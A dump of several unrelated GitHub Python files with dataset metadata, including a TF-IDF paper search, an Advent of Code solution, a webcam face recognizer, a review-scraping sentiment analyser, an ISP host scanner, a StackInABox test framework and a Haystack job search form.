data, leftovers = split_audio_into_chunks(sampling_rate, amplitude_vector, 20) | Sychee/Piano-Audio-Classifier | audio_to_spectogram.py | audio_to_spectogram.py | py | 1,820 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scipy.io.wavfile.read",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "scipy.io.wavfile",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "numpy.linspace",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot... |
22868444012 | import pandas as pd
import numpy as np
from nltk.corpus import stopwords
nltk_stopwords = stopwords.words('english')
# Sklearn TF-IDF Libraries
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
df_dataset = pd.read_csv("../crawler/layer_three_data.csv")
print("Database loaded in search function")
df_dataset = df_dataset.drop_duplicates(subset=['df_paper_title']) # remove duplicates
def search(keyword):
    """Rank papers by TF-IDF cosine similarity of their titles to `keyword`.

    Returns a DataFrame of the top 100 matches (best first) with columns
    Title / URL / Abstract / Author / Date, and prints it.
    """
    vectorizer = TfidfVectorizer()
    # Index paper titles
    X = vectorizer.fit_transform(df_dataset['df_paper_title'])
    query_vec = vectorizer.transform([keyword])  # Ip -- (n_docs,x), Op -- (n_docs,n_Feats)
    results = cosine_similarity(X, query_vec).reshape((-1,))
    # Collect rows first and build the frame once: DataFrame.append is
    # deprecated (removed in pandas 2.0) and quadratic when called per row.
    rows = []
    for i in results.argsort()[-100:][::-1]:
        rows.append({
            "Title": df_dataset.iloc[i, 0],
            "URL": df_dataset.iloc[i, 1],
            "Abstract": df_dataset.iloc[i, 2],
            "Author": df_dataset.iloc[i, 3],
            "Date": df_dataset.iloc[i, 4],
        })
    df_data = pd.DataFrame(rows, columns=["Title", "URL", "Abstract", "Author", "Date"])
    print(df_data)
    return df_data
| chois11/7071CEM-R | resources/backend/search_engine.py | search_engine.py | py | 1,376 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sklea... |
24644699429 | import io
import itertools
def part_one(filename='inputs\\day_1_part_1.txt'):
    """Sum all frequency changes in `filename`, print and return the total.

    Backward compatible: with no argument it reads the original input file;
    the total is now also returned (callers that ignored it are unaffected).
    The file is closed via the context manager (the original leaked it).
    """
    with open(filename) as file:
        total = sum(int(line) for line in file)
    print(f'Part 1 Total {total}')
    return total
def part_two(filename='inputs\\day_1_part_1.txt'):
    """Cycle through the frequency changes until a running total repeats.

    Prints and returns the first frequency reached twice (starting total 0).
    Backward compatible: with no argument it reads the original input file.
    The changes are read into a list first so the file is closed instead of
    being cycled while open, as the original did.
    """
    with open(filename) as file:
        changes = [int(str.strip(line)) for line in file]
    observed_frequencies = {0}
    total = 0
    for change in itertools.cycle(changes):
        total = total + change
        if total in observed_frequencies:
            print(f"Frequency {total} has been seen twice.")
            return total
        observed_frequencies.add(total)
part_two()
| mruston0/AdventOfCode2018 | day_1_chronal_calibration.py | day_1_chronal_calibration.py | py | 639 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.cycle",
"line_number": 15,
"usage_type": "call"
}
] |
41203564707 | import cv2
import numpy as np
from PIL import Image
facedetect = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')#create a cascade classifier using haar cascade
cam = cv2.VideoCapture(0)#creates avideo capture object
rec=cv2.createLBPHFaceRecognizer()#create a recognizer object
rec.load("test_trainingdata.yml")#load the training data
id=0
fontFace = cv2.FONT_HERSHEY_SIMPLEX#font to write the name of the person in the image
fontscale = 1
fontcolor = (255, 255, 255)
# Main recognition loop: grab webcam frames, detect faces, predict an id with
# the trained LBPH recognizer, and overlay the mapped name. Press 'q' to quit.
while(True):
    ret, img = cam.read()  # capture the frames from the camera object
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)  # convert the frame into grayscale
    faces = facedetect.detectMultiScale(gray, 1.3, 5)  # detect and extract faces from images
    for (x, y, w, h) in faces:
        cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
        id, conf = rec.predict(gray[y:y + h, x:x + w])  # Recognize the Id of the user
        # Map the numeric training label to a display name; anything else
        # is labelled "unknown".
        if(id == 8):
            id = "Saurav"
        elif(id == 1):
            id = "Upasana"
        elif(id == 3):
            id = "Nayan Sir"
        elif(id == 4):
            id = "Arnab Sir"
        elif(id == 5):
            id = "kabir"
        elif(id == 6):
            id = "Aakangsha"
        elif (id == 7):
            id = "Anish"
        else:
            id = "unknown"
        cv2.putText(img, str(id), (x, y + h), fontFace, fontscale, fontcolor)  # Put predicted Id/Name and rectangle on detected face
    cv2.imshow('img', img)
    if(cv2.waitKey(1) == ord('q')):
        break;
cam.release()  # close the camera
cv2.destroyAllWindows() #close all windows | UPASANANAG/Face-Recognizer | facedetector.py | facedetector.py | py | 1,437 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.CascadeClassifier",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "cv2.createLBPHFaceRecognizer",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.... |
26285333278 | import os, requests, colorama
from colorama import Fore
green = Fore.GREEN
red = Fore.RED
yellow = Fore.YELLOW
reset = Fore.RESET
#banner
banner = """
__ __ __
/ / / /___ _____/ /_
/ /_/ / __ \/ ___/ __/
/ __ / /_/ (__ ) /_
/_/_/_/\____/____/\__/_ ____ ___ _____
/ ___/ ___/ __ `/ __ \/ __ \/ _ \/ ___/
(__ ) /__/ /_/ / / / / / / / __/ /
/____/\___/\__,_/_/ /_/_/ /_/\___/_/ v.1.0
"""
os.system("clear")
print(green + banner + reset)
print(green + "[1]" + reset + "Dialog")
print(green + "[2]" + reset + "Mobitel")
print(green + "[3]" + reset + "Airtel")
# Prompt until the user picks a valid ISP option (1-3).
while True:
    try:
        isp = int(input(yellow + "Please select your ISP " + green + ">>>" + reset))
        if 0 < isp <= 3:
            break
        else:
            print(red + "Invalid value, please try agein!!" + reset)
            continue
    except:
        print(red + "Invalid value, please try agein!!" + reset)
        continue
isp_selfcare = ""
# Host used to probe basic connectivity for the chosen ISP.
if isp == 1:
    isp_selfcare = "www.dialog.lk"
elif isp == 2:
    isp_selfcare = "202.129.235.210"
elif isp == 3:
    isp_selfcare = "staysafe.gov.lk"
else:
    isp_selfcare = "none"
pms = False
host_list = []
# Connectivity check: pms stays False when the probe host is unreachable.
try:
    requests.post(f"http://{isp_selfcare}", timeout=2)
    pms = True
except:
    pms = False
    print(red + "OOPs...Your internet connection is not stable, Please Try agein!" + reset)
if pms == True:
    # Ask for a host-list file until one opens successfully.
    while True:
        try:
            ask_host_list = input(yellow + "Enter host list " + green + ">>>" + reset)
            h_list = open(str(ask_host_list), "r")
            new_file = input(yellow + "Enter name of output file " + green + ">>>" + reset)
            break
        except:
            print(red + "Please check your host list and try agein!" + reset)
            continue
    # Keep only hosts that answer an HTTP POST within 5 seconds.
    for x in h_list:
        try:
            requests.post(f"http://{x.strip()}", timeout=5)
            host_list.append(x)
        except:
            pass
    # Write the responsive hosts to <new_file>.txt.
    with open(f"{new_file}.txt", "w+") as file1:
        for x in host_list:
            file1.writelines(x)
    print(green + "done" + reset)
else:
    print("Fuck")
| Nadeesha-Prasad/Zero-Balance-Host-Scanner-For-Linux | hscan.py | hscan.py | py | 2,271 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "colorama.Fore.GREEN",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 3,
"usage_type": "name"
},
{
"api_name": "colorama.Fore.RED",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "colorama.F... |
21417420352 | import pandas as pd
import numpy as np
import requests
from textblob import TextBlob as tb
from bs4 import BeautifulSoup as bs
from matplotlib import pyplot as plt
import time
import nltk
import re
from IPython.display import clear_output
import matplotlib.pyplot as plt
import seaborn as sns
stopwords = nltk.corpus.stopwords.words("english")
def ruku_likn_de(url , pg = 20):
if url[12:12+6] == "amazon":
print("Amazon Link Detected")
return find_amazon_data_ruku(url , pg)
else:
print("FLipkart Link Detected")
return find_Flip_data_ruku(url , pg)
def mood(t):
mood = tb(t).sentiment.polarity
if mood > 0:
return "Happy"
elif mood == 0:
return "No Mood"
else:
return "Sad"
#Amazon Website
def find_amazon_data_ruku(link , pg = 10 ):
raw = link
last = pg
code = 0
review = []
for p in range(1,last+1):
num = raw.find("ref")
url_1 = raw[0:num]
url_2 = f"ref=cm_cr_arp_d_paging_btm_next_{p}?ie=UTF8&reviewerType=all_reviews&pageNumber={p}"
finalurl = url_1+url_2
finalurl = finalurl.replace("/dp/","/product-reviews/")
data = requests.get(finalurl)
print("amazon Link Detected")
if (data.reason) == "OK" :
code = code+1
data = bs(data.content ,"html.parser")
data = data.find_all(class_= "aok-relative")
print(int(p/last *100) , "% Completion")
print(int(code/last * 100) , "% Success Rate")
clear_output(wait=True)
for d in data:
d = {
"Rating" : float(d.find(class_="a-link-normal").text[0:3]),
"Title" : tb(d.find(class_="review-title-content").text).correct(),
"Content" : (d.find(class_="review-text-content").text),
"Polarity": mood(d.find(class_="review-text-content").text)
}
review.append(d)
print((code/last) * 100 ,"% is the Sucess rate")
data = pd.DataFrame(review)
data.replace("\n","",regex=True,inplace=True)
data["Polartiy"] = data["Content"].apply(mood)
for d in data.columns:
try:
data[d] = data[d].apply(low)
except:
pass
show_rating_bar(data)
show_pie_chart(data)
show_Sad_chart(data , n = 1)
show_Happy_chart(data, n = 1)
return review
#flipkart
def find_Flip_data_ruku(link , pg = 50):
raw = link
last = pg
code = 0
review = []
for p in range(1,last+1):
num = raw.find("&")
url_1 = raw[0:num+1]+f"page={p}"
url_1 = url_1.replace("/p/","/product-reviews/")
data = requests.get(url_1)
if (data.reason) == "OK" :
code = code+1
data = bs(data.content,"html.parser")
data = data.find_all(class_= "col _2wzgFH K0kLPL")
print(int(p/last *100) , "% Completion")
print(int(code/last * 100) , "% Sucess Rate")
clear_output(wait=True)
for d in data:
d = {
"Rating" : float(d.find(class_="_1BLPMq").text),
"Title" : d.find(class_="_2-N8zT").text,
"Content" : d.find(class_="t-ZTKy").text
}
review.append(d)
print((code/last) * 100 ,"% is the Sucess rate")
data = pd.DataFrame(review)
data.replace("\n","",regex=True,inplace=True)
def mood(t):
mood = tb(t).sentiment.polarity
if mood > 0:
return "Happy"
elif mood == 0:
return "No Mood"
else:
return "Sad"
data["Polartiy"] = data["Content"].apply(mood)
for d in data.columns:
try:
data[d] = data[d].apply(low)
except:
pass
show_rating_bar(data)
plt.close()
show_pie_chart(data)
plt.close()
show_Sad_chart(data , n = 2)
plt.close()
show_Happy_chart(data, n = 2)
plt.close()
return review
def low(text):
return text.lower()
def show_rating_bar(data):
rating = data.groupby(by="Rating")[["Title"]].count()
sns.barplot(y=rating.Title,x = rating.index)
plt.savefig("static/rate.png")
plt.clf()
# time.sleep(1)
def show_pie_chart(data):
try:
x = data.groupby(by="Polartiy")[["Content"]].count()
plt.pie(x = x.Content,autopct='%.2f',shadow=True,labels=x.index)
plt.savefig("static/pie.png")
plt.clf()
# time.sleep(1)
except:
pass
def show_Happy_chart(data, n = 1):
sad_data = data[data["Polartiy"] == "happy"]
words = []
for i in range(0,len(sad_data)):
a = data.Content[i]
a = re.sub("[', ),:,(,.,!,&,]"," ",a)
a = re.sub("[0-9]"," ",a)
a = " ".join(a.split())
a = nltk.word_tokenize(a)
a = nltk.ngrams(a,n)
for m in a:
if m not in stopwords:
words.append(m)
val = nltk.FreqDist(words).values()
key = nltk.FreqDist(words).keys()
data_1 = pd.DataFrame(data={"Key":key, "val": val})
data_1= data_1.sort_values(by = "val",ascending=False)[0:10]
plt.figure(figsize=(8,8))
sns.barplot(x = data_1.val, y = data_1.Key,orient="h")
plt.savefig("static/hapy.png")
plt.clf()
# time.sleep(1)
def show_Sad_chart(data , n = 1):
sad_data = data[data["Polartiy"] == "sad"]
words = []
for i in range(0,len(sad_data)):
a = data.Content[i]
a = re.sub("[', ),:,(,.,!,&,]"," ",a)
a = re.sub("[0-9]"," ",a)
a = " ".join(a.split())
a = nltk.word_tokenize(a)
a = nltk.ngrams(a,n)
for m in a:
if m not in stopwords:
words.append(m)
val = nltk.FreqDist(words).values()
key = nltk.FreqDist(words).keys()
data_1 = pd.DataFrame(data={"Key":key, "val": val})
data_1= data_1.sort_values(by = "val",ascending=False)[0:10]
sns.barplot(x = data_1.val, y = data_1.Key,orient="h")
plt.savefig("static/sad.png")
plt.clf()
# time.sleep(0)
def low(text):
return text.lower()
| Ruksana-Kauser/NLP_Final_Project | reviews.py | reviews.py | py | 6,211 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "nltk.corpus",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "textblob.TextBlob",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "reques... |
26009651155 | import argparse
import os
import random
import re
import subprocess
import time
parser = argparse.ArgumentParser()
parser.add_argument(
"-n", "--number", help="max number of problems to attempt", type=int
)
parser.add_argument(
"-r", "--random", help="attempt problems in random order", action="store_true"
)
parser.add_argument("-s", "--seed", help="random number seed", type=int)
parser.add_argument(
"-t", "--time", help="time limit per problem", type=float, default=60.0
)
parser.add_argument("files", nargs="*")
args = parser.parse_args()
if args.seed is not None:
args.random = 1
random.seed(args.seed)
if not args.files:
args.files = ["tptp"]
tptp = os.getenv("TPTP")
if not tptp:
raise Exception("TPTP environment variable not set")
problems = []
for arg in args.files:
if arg.lower() == "tptp":
arg = tptp
elif re.match(r"[A-Za-z][A-Za-z][A-Za-z]$", arg):
arg = arg.upper()
arg = os.path.join(tptp, "Problems", arg)
elif re.match(r"[A-Za-z][A-Za-z][A-Za-z]\d\d\d.\d+$", arg):
arg = arg.upper()
arg = os.path.join(tptp, "Problems", arg[:3], arg + ".p")
if os.path.isdir(arg):
for root, dirs, files in os.walk(arg):
for file in files:
ext = os.path.splitext(file)[1]
if ext == ".p" and "^" not in file and "_" not in file:
problems.append(os.path.join(root, file))
continue
if arg.endswith(".lst"):
for s in open(arg):
if "^" not in s:
problems.append(s.rstrip())
continue
problems.append(arg)
if args.random:
random.shuffle(problems)
if args.number:
problems = problems[0 : args.number]
def difficulty(file):
for s in open(file):
m = re.match(r"% Rating : (\d+\.\d+)", s)
if m:
return m[1]
return "?"
for file in problems:
print(os.path.basename(file), end="\t")
print(difficulty(file), end="\t", flush=True)
# --auto makes a big difference to performance
# don't use --auto-schedule
# for some reason, it breaks the subprocess timeout feature
cmd = "bin/eprover", "--auto", "-p", file
t = time.time()
try:
p = subprocess.run(
cmd, capture_output=True, encoding="utf-8", timeout=args.time
)
# if p.returncode == 3:
# print()
# continue
if p.returncode not in (0, 1, 9):
raise Exception(p.returncode)
print("%0.3f" % (time.time() - t), end="\t")
print(len(p.stdout.splitlines()), end="\t")
m = re.search(r"SZS status (\w+)", p.stdout)
r = m[1]
except subprocess.TimeoutExpired:
print("%0.3f" % (time.time() - t), end="\t")
print(0, end="\t")
r = "Timeout"
print(r)
| russellw/ayane | script/e.py | e.py | py | 2,820 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "random.seed",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_num... |
33052012137 | from sqlalchemy.orm import Session
import curd, cloud, orm
def policy_with_projects(yun, projects):
if not projects or len(projects) == 0:
return None
tagvals = ','.join(['"'+p.project.name+'"' for p in projects])
return yun.CloudIAM.policy_gen_write_with_tag("Project", tagvals)
def policy_with_teams(yun, teams):
if not teams or len(teams) == 0:
return None
tagvals = ','.join(['"'+p.team.name+'"' for p in teams])
return yun.CloudIAM.policy_gen_write_with_tag("Team", tagvals)
def policy_with_repos_read(yun, repos):
if not repos or len(repos) == 0:
return None
arns = ','.join(['"'+p.repo.arn+'"' for p in repos])
return yun.CloudIAM.get_by_user_read(arns)
def policy_with_repos_write(yun, repos):
if not repos or len(repos) == 0:
return None
arns = ','.join(['"'+p.repo.arn+'"' for p in repos])
return yun.CloudIAM.get_by_user_write(arns)
def update_user_policy(db: Session, user: orm.User, newly=False):
actions = []
name = user.name
projects = curd.ProjectAdmin.get_all_by_user(db, user.id)
teams = curd.TeamAdmin.get_all_by_user(db, user.id)
repos_read = curd.Perm.get_by_user_read(db, user.id)
repos_write = curd.Perm.get_by_user_write(db, user.id)
yun = cloud.get()
projectpolicy = policy_with_projects(yun, projects)
if projectpolicy:
actions.append(projectpolicy)
teampolicy = policy_with_teams(yun, teams)
if teampolicy:
actions.append(teampolicy)
readpolicy = policy_with_repos_read(yun, repos_read)
if readpolicy:
actions.append(readpolicy)
writepolicy = policy_with_repos_write(yun, repos_write)
if writepolicy:
actions.append(writepolicy)
rules = ','.join(actions)
policy = '{"Version": "2012-10-17","Statement": {['+rules+']}}'
if newly:
return yun.CloudIAM.policy_create(name, policy)
else:
return yun.CloudIAM.policy_update(user.ccpolicy, policy)
def refresh_policy_with_uid(db: Session, userid: int):
user = curd.User.get(db, userid)
return update_user_policy(db, user)
def refresh_policy_with_uname(db: Session, username: str):
user = curd.User.get_by_name(db, username)
return update_user_policy(db, user)
| kealiu/codecommitter | app/iam.py | iam.py | py | 2,267 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlalchemy.orm.Session",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "orm.User",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "curd.ProjectAdmin.get_all_by_user",
"line_number": 31,
"usage_type": "call"
},
{
"api_name":... |
40554209630 | """
Stack-In-A-Box: Stack Management
"""
import logging
import re
import threading
import uuid
import six
logger = logging.getLogger(__name__)
class ServiceAlreadyRegisteredError(Exception):
"""StackInABoxService with the same name already registered."""
pass
class StackInABox(object):
"""Stack-In-A-Box Testing Service.
StackInABox provides a testing framework for RESTful APIs
The framework provides a thread-local instance holding the
StackInABoxService objects that are representing the
RESTful APIs.
The StackInABox object provides a means of accessing it
from anywhere in a thread; however, it is not necessarily
thread-safe at this time. If one is careful o setup StackInABox
and write StackInABoxService's that are thread-safe
themselves, then there is no reason it could not be used in a
multi-threaded or multi-processed test.
"""
@classmethod
def get_thread_instance(cls):
"""
Interface to the thread storage to ensure the instance properly exists
"""
create = False
# if the `instance` property doesn't exist
if not hasattr(local_store, 'instance'):
local_store.instance = None
create = True
# if the instance doesn't exist at all
elif local_store.instance is None:
create = True
# if it's something else entirely...
elif not isinstance(local_store.instance, cls):
local_store.instance = None
create = True
# if the above conditions are met, create it
if create:
logger.debug('Creating new StackInABox instance...')
local_store.instance = cls()
logger.debug(
'Created StackInABox({0})'.format(local_store.instance.__id)
)
return local_store.instance
@classmethod
def reset_services(cls):
"""Reset the thread's StackInABox instance."""
logger.debug('Resetting services')
return cls.get_thread_instance().reset()
@classmethod
def register_service(cls, service):
"""Add a service to the thread's StackInABox instance.
:param service: StackInABoxService instance to add to the test
For return value and errors see StackInABox.register()
"""
logger.debug('Registering service {0}'.format(service.name))
return cls.get_thread_instance().register(service)
@classmethod
def call_into(cls, method, request, uri, headers):
"""Make a call into the thread's StackInABox instance.
:param method: HTTP Method (e.g GET, POST)
:param request: a Request object containing the request data
:param uri: the URI of the request submitted with the method
:param headers: the return headers in a Case-Insensitive dict
For return value and errors see StackInABox.call()
"""
logger.debug('Request: {0} - {1}'.format(method, uri))
return cls.get_thread_instance().call(method,
request,
uri,
headers)
@classmethod
def hold_onto(cls, name, obj):
"""Add data into the a storage area provided by the framework.
Note: The data is stored with the thread local instance.
:param name: name of the data to be stored
:param obj: data to be stored
For return value and errors see StackInABox.into_hold()
"""
logger.debug('Holding on {0} of type {1} with id {2}'
.format(name, type(obj), id(obj)))
cls.get_thread_instance().into_hold(name, obj)
@classmethod
def hold_out(cls, name):
"""Get data from the storage area provided by the framework.
Note: The data is retrieved from the thread local instance.
:param name: name of the data to be retrieved
:returns: The data associated with the specified name.
For errors see StackInABox.from_hold()
"""
logger.debug('Retreiving {0} from hold'
.format(name))
obj = cls.get_thread_instance().from_hold(name)
logger.debug('Retrieved {0} of type {1} with id {2} from hold'
.format(name, type(obj), id(obj)))
return obj
@classmethod
def update_uri(cls, uri):
"""Set the URI of the StackInABox framework.
:param uri: the base URI used to match the service.
"""
logger.debug('Request: Update URI to {0}'.format(uri))
cls.get_thread_instance().base_url = uri
def __init__(self):
"""Initialize the StackInABox instance.
Default Base URI is '/'.
There are no services registered, and the storage hold
is a basic dictionary object used as a key-value store.
"""
self.__id = uuid.uuid4()
self.__base_url = '/'
self.services = {
}
self.holds = {
}
@staticmethod
def __get_service_url(base_url, service_name):
"""Get the URI for a given StackInABoxService.
Note: this is an internal function
:param base_url: base URL to use
:param service_name: name of the service the URI is for
"""
return '{0}/{1}'.format(base_url, service_name)
@staticmethod
def get_services_url(url, base_url):
"""Get the URI from a given URL.
:returns: URI within the URL
"""
length = len(base_url)
checks = ['http://', 'https://']
for check in checks:
if url.startswith(check):
length = length + len(check)
break
result = url[length:]
logger.debug('{0} from {1} equals {2}'
.format(base_url, url, result))
return result
@property
def base_url(self):
"""Base URL property."""
return self.__base_url
@base_url.setter
def base_url(self, value):
"""Set the Base URL property, updating all associated services."""
logger.debug('StackInABox({0}): Updating URL from {1} to {2}'
.format(self.__id, self.__base_url, value))
self.__base_url = value
for k, v in six.iteritems(self.services):
matcher, service = v
service.base_url = StackInABox.__get_service_url(value,
service.name)
logger.debug('StackInABox({0}): Service {1} has url {2}'
.format(self.__id, service.name, service.base_url))
def reset(self):
"""Reset StackInABox to a like-new state."""
logger.debug('StackInABox({0}): Resetting...'
.format(self.__id))
for k, v in six.iteritems(self.services):
matcher, service = v
logger.debug('StackInABox({0}): Resetting Service {1}'
.format(self.__id, service.name))
service.reset()
self.services = {}
self.holds = {}
logger.debug('StackInABox({0}): Reset Complete'
.format(self.__id))
def register(self, service):
"""Add a service to the thread's StackInABox instance.
:param service: StackInABoxService instance to add to the test
:returns: None
:raises: ServiceAlreadyRegisteredError if the service already exists
"""
if service.name not in self.services.keys():
logger.debug('StackInABox({0}): Registering Service {1}'
.format(self.__id, service.name))
regex = '^/{0}/'.format(service.name)
self.services[service.name] = [
re.compile(regex),
service
]
service.base_url = StackInABox.__get_service_url(self.base_url,
service.name)
logger.debug('StackInABox({0}): Service {1} has url {2}'
.format(self.__id, service.name, service.base_url))
else:
raise ServiceAlreadyRegisteredError(
'Service {0} is already registered'.format(service.name))
def call(self, method, request, uri, headers):
"""Make a call into the thread's StackInABox instance.
:param method: HTTP Method (e.g GET, POST)
:param request: a Request object containing the request data
:param uri: the URI of the request submitted with the method
:param headers: the return headers in a Case-Insensitive dict
:returns: A tuple containing - (i) the Status Code, (ii) the response
headers, and (iii) the response body data
This function should not emit any Exceptions
"""
logger.debug('StackInABox({0}): Received call to {1} - {2}'
.format(self.__id, method, uri))
service_uri = StackInABox.get_services_url(uri, self.base_url)
for k, v in six.iteritems(self.services):
matcher, service = v
logger.debug('StackInABox({0}): Checking if Service {1} handles...'
.format(self.__id, service.name))
logger.debug('StackInABox({0}): ...using regex pattern {1} '
'against {2}'
.format(self.__id, matcher.pattern, service_uri))
if matcher.match(service_uri):
logger.debug('StackInABox({0}): Trying Service {1} handler...'
.format(self.__id, service.name))
try:
service_caller_uri = service_uri[(len(service.name) + 1):]
return service.request(method,
request,
service_caller_uri,
headers)
except Exception as ex:
logger.exception('StackInABox({0}): Service {1} - '
'Internal Failure'
.format(self.__id, service.name))
return (596,
headers,
'Service Handler had an error: {0}'.format(ex))
return (597, headers, 'Unknown service - {0}'.format(service_uri))
def into_hold(self, name, obj):
"""Add data into the a storage area provided by the framework.
Note: The data is stored with the thread local instance.
:param name: name of the data to be stored
:param obj: data to be stored
:returns: N/A
:raises: N/A
"""
logger.debug('StackInABox({0}): Holding onto {1} of type {2} '
'with id {3}'
.format(self.__id, name, type(obj), id(obj)))
self.holds[name] = obj
def from_hold(self, name):
"""Get data from the storage area provided by the framework.
Note: The data is retrieved from the thread local instance.
:param name: name of the data to be retrieved
:returns: The data associated with the specified name.
:raises: Lookup/KeyError error if the name does not match
a value in the storage
"""
logger.debug('StackInABox({0}): Retreiving {1} from the hold'
.format(self.__id, name))
obj = self.holds[name]
logger.debug('StackInABox({0}): Retrieved {1} of type {2} with id {3}'
.format(self.__id, name, type(obj), id(obj)))
return obj
# Thread local instance of StackInABox
local_store = threading.local()
| TestInABox/stackInABox | stackinabox/stack.py | stack.py | py | 11,760 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "uuid.uuid4",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "six.iteritems",
"line_number": 209,
"usage_type": "call"
},
{
"api_name": "six.iteritems",
"lin... |
36570577773 | from haystack.forms import SearchForm
from django import forms
from haystack.query import SearchQuerySet
from haystack.query import SQ
from peeldb.models import City
valid_time_formats = ["%Y-%m-%d 00:00:00"]
class job_searchForm(SearchForm):
q = forms.CharField(max_length=200, required=False)
location = forms.CharField(required=False)
experience = forms.IntegerField(required=False)
salary = forms.IntegerField(required=False)
job_type = forms.CharField(required=False)
industry = forms.CharField(required=False)
functional_area = forms.CharField(required=False)
walkin_from_date = forms.DateField(required=False)
walkin_to_date = forms.DateField(required=False)
walkin_type = forms.CharField(required=False)
refine_location = forms.CharField(required=False)
def search(self):
# sqs = SearchQuerySet().models(JobPost).filter(status='Live')
sqs = SearchQuerySet()
sqs = sqs.filter_and(status="Live")
if not self.is_valid():
return sqs
if self.cleaned_data["q"] and self.cleaned_data["location"]:
term = self.cleaned_data["q"]
term = term.replace("[", "")
term = term.replace("]", "")
term = term.replace("'", "")
# sqs = sqs.filter_and(SQ(title=term) | SQ(designation=term)| SQ(skills=term))
terms = [t.strip() for t in term.split(",")]
sqs = sqs.filter_and(
SQ(title__in=terms) | SQ(designation__in=terms) | SQ(skills__in=terms)
)
# sqs = sqs.filter_or(SQ(designation__in=terms))
# sqs = sqs.filter_or(SQ(skills__in=terms))
location = self.cleaned_data["location"]
location = location.replace("[", "")
location = location.replace("]", "")
location = location.replace("'", "")
locations = [t.strip() for t in location.split(",")]
other_cities = City.objects.filter(name__in=locations).values_list(
"parent_city__name", flat=True
)
sqs = sqs.filter_and(
SQ(location__in=locations)
| SQ(location__startswith=self.cleaned_data["location"])
| SQ(location__in=other_cities)
)
if self.cleaned_data["job_type"]:
sqs = sqs.filter_and(job_type=self.cleaned_data["job_type"])
if self.cleaned_data["industry"]:
term = self.cleaned_data["industry"]
# sqs = sqs.filter_and(SQ(title=term) | SQ(designation=term)| SQ(skills=term))
terms = [t.strip() for t in term.split(",")]
sqs = sqs.filter_or(industry__in=terms)
if self.cleaned_data["functional_area"]:
term = self.cleaned_data["functional_area"]
# sqs = sqs.filter_and(SQ(title=term) | SQ(designation=term)| SQ(skills=term))
terms = [t.strip() for t in term.split(",")]
sqs = sqs.filter_or(functional_area__in=terms)
if self.cleaned_data["experience"] or self.cleaned_data["experience"] == 0:
sqs = sqs.filter_or(
SQ(max_experience__gte=self.cleaned_data["experience"])
& SQ(min_experience__lte=self.cleaned_data["experience"])
)
if self.cleaned_data["salary"]:
sqs = sqs.filter_or(
SQ(max_salary__gte=self.cleaned_data["salary"])
& SQ(min_salary__lte=self.cleaned_data["salary"])
)
if self.cleaned_data["walkin_type"]:
import datetime
if self.cleaned_data["walkin_type"] == "this_week":
date = datetime.date.today()
start_week = (
date
- datetime.timedelta(date.weekday())
- datetime.timedelta(1)
)
end_week = start_week + datetime.timedelta(6)
start_week = datetime.datetime.strptime(
str(start_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
end_week = datetime.datetime.strptime(
str(end_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__range=[start_week, end_week])
| SQ(walkin_to_date__range=[start_week, end_week])
)
if self.cleaned_data["walkin_type"] == "next_week":
date = datetime.date.today()
start_week = (
date
- datetime.timedelta(date.isoweekday())
+ datetime.timedelta(7)
)
end_week = start_week + datetime.timedelta(6)
start_week = datetime.datetime.strptime(
str(start_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
end_week = datetime.datetime.strptime(
str(end_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__range=[start_week, end_week])
| SQ(walkin_to_date__range=[start_week, end_week])
)
# sqs = sqs.filter_and(SQ(walkin_from_date__range=[start_week, end_week]) | SQ(walkin_to_date__range=[start_week, end_week]))
if self.cleaned_data["walkin_type"] == "this_month":
current_date = datetime.date.today()
from dateutil.relativedelta import relativedelta
from datetime import date
start_week = date(current_date.year, current_date.month, 1)
end_week = start_week + relativedelta(day=31)
start_week = datetime.datetime.strptime(
str(start_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
end_week = datetime.datetime.strptime(
str(end_week), "%Y-%m-%d"
).strftime("%Y-%m-%d")
sqs = sqs.filter_and(
SQ(walkin_from_date__range=[start_week, end_week])
| SQ(walkin_to_date__range=[start_week, end_week])
)
# if self.cleaned_data['walkin_type'] == 'next_month':
# pass
if self.cleaned_data["walkin_type"] == "custom_range":
if self.cleaned_data["walkin_from_date"]:
